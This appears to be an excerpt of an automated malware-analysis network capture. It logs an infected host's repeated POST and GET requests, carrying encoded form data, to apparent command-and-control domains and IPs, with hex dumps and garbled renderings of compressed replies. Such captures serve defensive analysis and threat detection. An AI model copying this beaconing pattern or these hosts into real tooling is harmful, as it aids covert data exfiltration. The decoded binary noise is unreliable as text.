                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 32 5f 34 3d 6b 4b 38 65 47 5a 65 4f 4c 30 63 30 69 37 70 5a 30 4f 4e 50 49 4e 59 41 47 5a 6f 41 50 57 70 64 34 6e 43 4c 65 67 67 6a 63 6a 38 48 6f 50 41 4a 6a 73 70 53 47 6f 6d 41 4d 75 44 53 53 61 79 77 31 62 4d 6e 4c 36 4a 66 47 6a 59 33 50 39 71 74 43 30 77 2b 72 75 6c 34 32 2f 35 70 6b 6c 52 70 51 31 76 61 30 74 30 6b 44 64 56 56 71 55 39 72 7a 45 55 2f 44 4b 77 3d 26 75 58 50 3d 31 48 58 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8"}</script></head></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              58192.168.11.2049799161.97.142.14480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:55.414917946 CET726OUTPOST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 33 57 49 45 66 46 4a 73 2b 4d 53 70 4f 6b 74 4f 2f 7a 6a 65 7a 6c 2b 43 36 63 47 33 51 63 4b 74 48 2f 65 53 5a 49 6c 34 58 74 69 79 5a 4d 34 6d 48 56 61 5a 4a 64 4f 35 6b 6f 33 62 35 38 52 42 2b 38 63 42 65 51 61 6e 50 67 6a 67 32 6d 56 38 55 52 4a 34 38 64 69 4e 69 59 4d 66 5a 76 65 53 4e 72 68 64 33 33 57 33 49 7a 61 2b 62 79 71 64 74 76 61 31 43 77 68 41 42 77 4f 72 46 6f 5a 75 32 4a 66 6c 42 31 63 52 51 66 62 66 4c 50 69 71 5a 35 33 55 71 53 41 5a 6b 33 54 6e 31 32 6b 4c 61 6b 7a 75 6e 65 6b 69 44 63 75 43 32 47 45 42 68 35 41 56 67 3d 3d
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17Rlk3WIEfFJs+MSpOktO/zjezl+C6cG3QcKtH/eSZIl4XtiyZM4mHVaZJdO5ko3b58RB+8cBeQanPgjg2mV8URJ48diNiYMfZveSNrhd33W3Iza+byqdtva1CwhABwOrFoZu2JflB1cRQfbfLPiqZ53UqSAZk3Tn12kLakzunekiDcuC2GEBh5AVg==
                                                                                                              Nov 5, 2024 15:37:55.602787971 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:37:55 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
                                                                                                              Nov 5, 2024 15:37:55.602796078 CET317INData Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19
                                                                                                              Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              59192.168.11.2049800161.97.142.14480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:58.136048079 CET746OUTPOST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 57 47 49 43 4d 64 4a 72 65 4d 64 6e 75 6b 74 41 66 7a 6e 65 7a 70 2b 43 2b 46 42 33 46 4d 4b 6a 44 7a 65 54 59 49 6c 35 58 74 69 36 35 4d 35 6f 6e 56 52 5a 4a 52 38 35 6d 73 33 62 35 59 52 42 37 41 63 47 6f 59 5a 6f 2f 67 68 70 57 6d 58 2f 6b 52 4a 34 38 64 69 4e 69 63 79 66 5a 33 65 56 39 62 68 66 54 62 52 35 6f 7a 46 35 62 79 71 5a 74 76 57 31 43 78 79 41 45 55 6f 72 48 51 5a 75 33 35 66 69 54 64 62 62 51 66 42 62 4c 4f 63 6d 61 67 64 64 2b 75 73 59 48 62 57 74 32 6d 74 4b 4d 31 70 7a 56 71 41 68 51 41 63 47 47 2f 73 44 6a 34 62 49 76 36 77 70 45 36 38 34 54 73 7a 33 67 44 38 6f 5a 55 50 30 49 6b 3d
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17RlkWGICMdJreMdnuktAfznezp+C+FB3FMKjDzeTYIl5Xti65M5onVRZJR85ms3b5YRB7AcGoYZo/ghpWmX/kRJ48diNicyfZ3eV9bhfTbR5ozF5byqZtvW1CxyAEUorHQZu35fiTdbbQfBbLOcmagdd+usYHbWt2mtKM1pzVqAhQAcGG/sDj4bIv6wpE684Tsz3gD8oZUP0Ik=
                                                                                                              Nov 5, 2024 15:37:58.325383902 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:37:58 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
                                                                                                              Nov 5, 2024 15:37:58.325428009 CET317INData Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19
                                                                                                              Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              60192.168.11.2049801161.97.142.14480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:00.851941109 CET1289OUTPOST /o2wj/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.030002832.xyz
                                                                                                              Origin: http://www.030002832.xyz
                                                                                                              Referer: http://www.030002832.xyz/o2wj/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 33 4a 46 44 43 33 78 71 31 37 52 6c 6b 57 47 49 43 4d 64 4a 72 65 4d 64 6e 75 6b 74 41 66 7a 6e 65 7a 70 2b 43 2b 46 42 33 46 45 4b 6a 32 76 65 53 37 67 6c 36 58 74 69 6d 70 4d 30 6f 6e 56 32 5a 4a 35 34 35 6d 78 41 62 37 51 52 41 64 55 63 48 61 77 5a 2f 76 67 68 72 57 6d 4b 38 55 52 63 34 34 42 6d 4e 69 73 79 66 5a 33 65 56 2f 44 68 62 48 33 52 30 49 7a 61 2b 62 79 32 64 74 75 4a 31 43 34 48 41 45 51 34 71 32 77 5a 75 55 42 66 6e 67 31 62 58 51 66 66 63 4c 4f 55 6d 61 63 47 64 2b 61 67 59 47 76 77 74 31 47 74 49 6f 6f 78 67 42 2b 4b 69 41 4d 6e 43 33 32 61 4e 6c 30 37 57 64 4b 73 74 43 69 73 77 48 30 51 70 51 48 58 7a 4b 63 6c 33 49 4e 7a 76 49 66 44 7a 57 70 6c 65 6a 55 63 33 53 75 7a 36 30 63 4c 4a 4f 4f 44 76 69 4b 55 66 75 62 76 7a 58 6b 55 6e 59 50 31 4d 42 6b 31 4f 57 71 50 72 32 6e 42 47 64 41 63 54 42 33 6b 52 47 55 71 51 68 54 64 4c 75 78 4a 45 66 65 66 64 53 59 72 79 69 50 31 6a 44 67 72 31 53 49 70 49 62 33 2f 42 42 65 72 34 6f 49 68 57 67 79 36 44 69 66 59 4e 33 67 69 68 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=3JFDC3xq17RlkWGICMdJreMdnuktAfznezp+C+FB3FEKj2veS7gl6XtimpM0onV2ZJ545mxAb7QRAdUcHawZ/vghrWmK8URc44BmNisyfZ3eV/DhbH3R0Iza+by2dtuJ1C4HAEQ4q2wZuUBfng1bXQffcLOUmacGd+agYGvwt1GtIooxgB+KiAMnC32aNl07WdKstCiswH0QpQHXzKcl3INzvIfDzWplejUc3Suz60cLJOODviKUfubvzXkUnYP1MBk1OWqPr2nBGdAcTB3kRGUqQhTdLuxJEfefdSYryiP1jDgr1SIpIb3/BBer4oIhWgy6DifYN3gih2MTOMQnJDe0Xf3VMdvJ45olmUvWfOIxSFOerPTlB4+WO0YMr+YUXTaP9rqGtliVtWduNUhZGDuZyo1Bc8zKDaSizuY/XhSz90o5x1z5Do+Ba7OVwKF6A+OwKJ8b3unvGVbuyoJP11sFMBc+TtnTjwJKjQj5tOvQxh1EaP+j5uiBa+jDz6COvNQ1IYNw+IAPdPWO9hwxV+1fjtBxUUvX/UcxivqTyHAnHV2Nb48gMjNklIsxnvXLE8yq5CjZQrrhYE5uvwva4nH9EnnfpzVN7kxu95wceyn22YEGrwDIyOxeuLmLfR2d20i6vcmOg0Nu/ro9SvJ3KfzTCZOXKrUhC1O28D0Rxq/9lgtTTNnd3iG8X/sYayVNXpxz8C69dhNlHjW0LRmIt//zMvUG4bDAbLVXQF+liapjHB/HQcZ6fh
                                                                                                              Nov 5, 2024 15:38:00.851991892 CET2578OUTData Raw: 71 79 38 68 6c 6b 42 4f 48 54 46 72 63 51 43 39 75 70 38 57 39 50 39 2f 4c 5a 77 67 74 62 2f 49 6c 71 48 37 43 6b 58 2b 33 55 38 51 5a 32 67 71 77 4c 35 6b 32 6c 46 79 41 4d 42 52 71 43 75 52 43 66 32 4c 51 58 38 4a 52 36 44 6f 31 57 41 4f 36 4c
                                                                                                              Data Ascii: qy8hlkBOHTFrcQC9up8W9P9/LZwgtb/IlqH7CkX+3U8QZ2gqwL5k2lFyAMBRqCuRCf2LQX8JR6Do1WAO6LXkQkMGB6FjVwi1GTSBV02Te3eguyAhu1I4ium9nNlc5aVOnfrTfMb+EYH4eAGE5PxYZt5teFRPaasWSk6hkuAaKbmlmTYj4xyyo2VH9GCi/evrOMcaVsrX8IEC23UN878OB6tziGoa9xj1piXftBVz0ga5jgaM1K2
                                                                                                              Nov 5, 2024 15:38:00.852045059 CET4028OUTData Raw: 55 42 7a 73 7a 73 71 57 5a 39 6d 4a 68 7a 53 4d 55 71 7a 59 66 33 54 4b 4b 6c 63 73 73 55 73 36 50 41 76 31 72 72 34 4e 2b 31 73 4c 44 67 37 7a 41 6a 75 79 76 33 76 31 4e 4d 42 49 77 6f 57 45 50 69 30 41 6d 79 63 71 45 38 4a 47 38 48 65 52 4a 50
                                                                                                              Data Ascii: UBzszsqWZ9mJhzSMUqzYf3TKKlcssUs6PAv1rr4N+1sLDg7zAjuyv3v1NMBIwoWEPi0AmycqE8JG8HeRJPN02yxuilBLuRHeKfNi6yuNoDy7fvVp269bPnbD3f5r5zFoiNCE8r6lraCz6utdwkAxE8WTc0vOdSBZ9A19T0SNyvu3HPoUhvrRRfDhwOBTk3/NSZiOuPWBHlUkqHIA1wXYAqniskXoAN0j2PEKTdtkvhWkAZBAstt
                                                                                                              Nov 5, 2024 15:38:01.040896893 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:38:00 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
                                                                                                              Nov 5, 2024 15:38:01.040944099 CET317INData Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19
                                                                                                              Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              61192.168.11.2049802161.97.142.14480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:03.568806887 CET457OUTGET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.030002832.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:38:03.760319948 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Tue, 05 Nov 2024 14:38:03 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Content-Length: 2966
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: "66cce1df-b96"
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                              Nov 5, 2024 15:38:03.760343075 CET1289INData Raw: 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61
                                                                                                              Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
                                                                                                              Nov 5, 2024 15:38:03.760349989 CET592INData Raw: 37 20 30 2d 35 38 2e 30 30 32 2d 36 30 2e 31 36 35 2d 31 30 32 2d 31 31 36 2e 35 33 31 2d 31 30 32 7a 4d 32 35 36 20 33 33 38 63 2d 32 35 2e 33 36 35 20 30 2d 34 36 20 32 30 2e 36 33 35 2d 34 36 20 34 36 20 30 20 32 35 2e 33 36 34 20 32 30 2e 36
                                                                                                              Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              62192.168.11.2049803119.18.54.2780
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:09.226814032 CET726OUTPOST /44hl/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
